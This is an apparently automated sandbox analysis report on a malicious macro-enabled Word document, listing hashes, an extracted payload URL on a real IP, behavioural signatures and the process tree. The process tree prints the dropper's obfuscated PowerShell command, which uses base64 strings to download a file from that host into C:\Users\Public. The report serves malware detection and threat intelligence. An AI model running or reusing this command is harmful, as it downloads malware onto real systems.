Analysis
-
max time kernel
65s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 22:04
Static task
static1
Behavioral task
behavioral1
Sample
1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm
Resource
win10v2004-20220414-en
General
-
Target
1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm
-
Size
153KB
-
MD5
6d713af398101fb1ce7c6cd4831fd01e
-
SHA1
83be76755052d2a67ea1f07d4de4b937327e19fe
-
SHA256
1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29
-
SHA512
2b0a9adafb002b3f2fb7f62fdee15572aa7883554b4780474aaaa1b2c82759c13ad3c6868f95c9399ee685094cb2b469b127f7fbf48567fb3f87b8ae178d7d3a
Malware Config
Extracted
http://62.171.152.105/Hfhue723bhDSF9uyhfwe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4700 4052 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4692 4052 cmd.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2496 4052 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 22 2160 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4052 WINWORD.EXE 4052 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2160 powershell.exe 2160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2160 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 4052 WINWORD.EXE 4052 WINWORD.EXE 4052 WINWORD.EXE 4052 WINWORD.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.execmd.exedescription pid process target process PID 4052 wrote to memory of 4700 4052 WINWORD.EXE cmd.exe PID 4052 wrote to memory of 4700 4052 WINWORD.EXE cmd.exe PID 4700 wrote to memory of 4648 4700 cmd.exe cmd.exe PID 4700 wrote to memory of 4648 4700 cmd.exe cmd.exe PID 4052 wrote to memory of 4692 4052 WINWORD.EXE cmd.exe PID 4052 wrote to memory of 4692 4052 WINWORD.EXE cmd.exe PID 4052 wrote to memory of 2496 4052 WINWORD.EXE cmd.exe PID 4052 wrote to memory of 2496 4052 WINWORD.EXE cmd.exe PID 4692 wrote to memory of 2160 4692 cmd.exe powershell.exe PID 4692 wrote to memory of 2160 4692 cmd.exe powershell.exe PID 2496 wrote to memory of 4424 2496 cmd.exe cmd.exe PID 2496 wrote to memory of 4424 2496 cmd.exe cmd.exe PID 4424 wrote to memory of 720 4424 cmd.exe choice.exe PID 4424 wrote to memory of 720 4424 cmd.exe choice.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\hg32j.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c mkdir C:\Users\Public\kjh4ek3⤵
-
C:\Windows\SYSTEM32\cmd.execmd /C powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzYyLjE3MS4xNTIuMTA1L0hmaHVlNzIzYmhEU0Y5dXloZndl')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXGNhbGMuZXhl')))2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzYyLjE3MS4xNTIuMTA1L0hmaHVlNzIzYmhEU0Y5dXloZndl')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXGNhbGMuZXhl')))3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\kjh4ek\ndj34h.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 203⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 204⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\hg32j.batFilesize
35B
MD5a5da72ee0446ec6ccf16298d20de53d9
SHA1d39910505712193c1058d77663d828f81075b7bf
SHA256c6b36bf33bea0b0b636ccf415fbc9f99b66a0d8871883869bd0dbf6ee7508836
SHA51212e33315a913ce92125f2805b9141ddad520818e73fb35f8be9d383b2642c137bbe4b8df770418e9a051f1a21f8d45aa4f242bfea933f4007488cb49f4922939
-
C:\Users\Public\kjh4ek\ndj34h.batFilesize
83B
MD5b95ea117e4f9873b9016c76c31a2f572
SHA1b54c86c8d1418b5cfc75fd4f75292ffc040cb4ad
SHA25678e21ae946d4d531c82c859a58c6aa0e0f6c346a30d542be7c2079426ba6e177
SHA512d58d157224fde457dc1e40d1cad7429da96bf49015e1d6cbf2d1dd4085cd2ba723cfd439960922522942603f7f12879e76b4644160bec688f911224fd44f5b83
-
memory/720-146-0x0000000000000000-mapping.dmp
-
memory/2160-148-0x00007FF9D0FA0000-0x00007FF9D1A61000-memory.dmpFilesize
10.8MB
-
memory/2160-147-0x0000022F68900000-0x0000022F68922000-memory.dmpFilesize
136KB
-
memory/2160-143-0x0000000000000000-mapping.dmp
-
memory/2496-142-0x0000000000000000-mapping.dmp
-
memory/4052-135-0x00007FF9BA220000-0x00007FF9BA230000-memory.dmpFilesize
64KB
-
memory/4052-150-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmpFilesize
64KB
-
memory/4052-137-0x000002738A020000-0x000002738A024000-memory.dmpFilesize
16KB
-
memory/4052-152-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmpFilesize
64KB
-
memory/4052-153-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmpFilesize
64KB
-
memory/4052-136-0x00007FF9BA220000-0x00007FF9BA230000-memory.dmpFilesize
64KB
-
memory/4052-130-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmpFilesize
64KB
-
memory/4052-151-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmpFilesize
64KB
-
memory/4052-134-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmpFilesize
64KB
-
memory/4052-133-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmpFilesize
64KB
-
memory/4052-132-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmpFilesize
64KB
-
memory/4052-131-0x00007FF9BC5B0000-0x00007FF9BC5C0000-memory.dmpFilesize
64KB
-
memory/4424-145-0x0000000000000000-mapping.dmp
-
memory/4648-140-0x0000000000000000-mapping.dmp
-
memory/4692-141-0x0000000000000000-mapping.dmp
-
memory/4700-138-0x0000000000000000-mapping.dmp